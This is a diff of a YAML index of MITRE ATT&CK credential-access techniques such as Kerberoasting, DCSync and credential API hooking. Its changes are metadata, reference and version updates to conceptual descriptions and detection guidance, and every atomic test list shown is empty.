         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -48227,6 +48925,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -48237,23 +48936,50 @@ credential-access:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1111:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:37:20.612Z'
       name: Multi-Factor Authentication Interception
       description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
         (i.e., smart cards, token generators, etc.) to gain access to credentials
@@ -48324,9 +49050,8 @@ credential-access:
         url: https://sec.okta.com/scatterswine
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.003:
     technique:
@@ -48385,12 +49110,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.003
     atomic_tests: []
   T1558.003:
     technique:
-      modified: '2023-03-30T21:01:46.538Z'
+      modified: '2024-09-23T22:20:10.994Z'
       name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
       description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
         (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
@@ -48422,6 +49146,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -48431,7 +49156,6 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -48443,111 +49167,49 @@ credential-access:
       id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
       created: '2020-02-11T18:43:38.588Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1558/003
         external_id: T1558.003
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
       - source_name: Empire InvokeKerberoast Oct 2016
         description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
           March 22, 2018.
         url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
           Domain. Retrieved March 22, 2018.
         url: https://adsecurity.org/?p=2293
-      - source_name: Microsoft Detecting Kerberoasting Feb 2018
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Microsoft SPN
-        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
-          2018.
-        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Microsoft SetSPN
         description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
           Syntax (Setspn.exe). Retrieved March 22, 2018.
         url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
-      - source_name: SANS Attacking Kerberos Nov 2014
-        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        url: https://redsiege.com/kerberoast-slides
+      - source_name: Microsoft SPN
+        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+          2018.
+        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Harmj0y Kerberoast Nov 2016
         description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
-          Retrieved March 23, 2018.
-        url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+          Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.003
     atomic_tests: []
   T1003.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ExtraHop
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
-      type: attack-pattern
-      created: '2020-02-11T18:45:34.293Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.006
-        url: https://attack.mitre.org/techniques/T1003/006
-      - url: https://msdn.microsoft.com/library/cc228086.aspx
-        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
-          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
-        source_name: Microsoft DRSR Dec 2017
-      - url: https://msdn.microsoft.com/library/dd207691.aspx
-        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
-          4, 2017.
-        source_name: Microsoft GetNCCChanges
-      - url: https://wiki.samba.org/index.php/DRSUAPI
-        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
-        source_name: Samba DRSUAPI
-      - url: https://source.winehq.org/WineAPI/samlib.html
-        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
-        source_name: Wine API samlib.dll
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved August 7, 2017.
-        source_name: ADSecurity Mimikatz DCSync
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved August 7, 2017.
-        source_name: Harmj0y Mimikatz and DCSync
-      - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
-        description: Warren, J. (2017, July 11). Manipulating User Passwords with
-          Mimikatz. Retrieved December 4, 2017.
-        source_name: InsiderThreat ChangeNTLM July 2017
-      - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
-        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
-          August 7, 2017.
-        source_name: GitHub Mimikatz lsadump Module
-      - url: https://msdn.microsoft.com/library/cc237008.aspx
-        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
-          Retrieved December 6, 2017.
-        source_name: Microsoft NRPC Dec 2017
-      - url: https://msdn.microsoft.com/library/cc245496.aspx
-        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
-          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
-        source_name: Microsoft SAMR
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved December 4, 2017.
-        source_name: AdSecurity DCSync Sept 2015
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved December 4, 2017.
-        source_name: Harmj0y DCSync Sept 2015
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:54:08.312Z'
       name: 'OS Credential Dumping: DCSync'
       description: |-
         Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
@@ -48558,26 +49220,88 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - ExtraHop
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
 
         Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+      created: '2020-02-11T18:45:34.293Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/006
+        external_id: T1003.006
+      - source_name: GitHub Mimikatz lsadump Module
+        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+          August 7, 2017.
+        url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+      - source_name: ADSecurity Mimikatz DCSync
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved August 7, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: AdSecurity DCSync Sept 2015
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved December 4, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: Microsoft DRSR Dec 2017
+        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc228086.aspx
+      - source_name: Microsoft NRPC Dec 2017
+        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+          Retrieved December 6, 2017.
+        url: https://msdn.microsoft.com/library/cc237008.aspx
+      - source_name: Microsoft GetNCCChanges
+        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+          4, 2017.
+        url: https://msdn.microsoft.com/library/dd207691.aspx
+      - source_name: Microsoft SAMR
+        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc245496.aspx
+      - source_name: Samba DRSUAPI
+        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+        url: https://wiki.samba.org/index.php/DRSUAPI
+      - source_name: Harmj0y DCSync Sept 2015
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved December 4, 2017.
+        url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: Harmj0y Mimikatz and DCSync
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: InsiderThreat ChangeNTLM July 2017
+        description: Warren, J. (2017, July 11). Manipulating User Passwords with
+          Mimikatz. Retrieved December 4, 2017.
+        url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+      - source_name: Wine API samlib.dll
+        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+        url: https://source.winehq.org/WineAPI/samlib.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.006
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -48590,6 +49314,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -48626,17 +49351,17 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -48682,81 +49407,10 @@ credential-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
-      type: attack-pattern
-      created: '2020-02-11T19:01:15.930Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1056.004
-        url: https://attack.mitre.org/techniques/T1056/004
-      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
-        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
-          Retrieved December 18, 2017.
-        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
-        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
-          December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
-        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
-        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
-          12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
-        description: Stack Exchange - Security. (2012, July 31). What are the methods
-          to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-27T21:03:56.385Z'
       name: 'Input Capture: Credential API Hooking'
       description: |
         Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
@@ -48769,28 +49423,94 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
 
         Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
 
         Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      created: '2020-02-11T19:01:15.930Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
+      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+          Retrieved December 18, 2017.
+        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+      - source_name: Microsoft Hook Overview
+        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+          December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
+        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
+        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+          12, 2017.
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
+        description: Stack Exchange - Security. (2012, July 31). What are the methods
+          to find hooked functions and APIs?. Retrieved December 12, 2017.
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1056.004
     atomic_tests: []
   T1552.007:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:25:28.820Z'
       name: Kubernetes List Secrets
       description: "Adversaries may gather credentials via APIs within a containers
         environment. APIs in these environments, such as the Docker API and Kubernetes
@@ -48847,9 +49567,8 @@ credential-access:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.007
     atomic_tests: []
   T1556.004:
@@ -48880,7 +49599,7 @@ credential-access:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -48904,8 +49623,6 @@ credential-access:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 discovery:
   T1033:
@@ -48970,12 +49687,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1033
     atomic_tests: []
   T1613:
     technique:
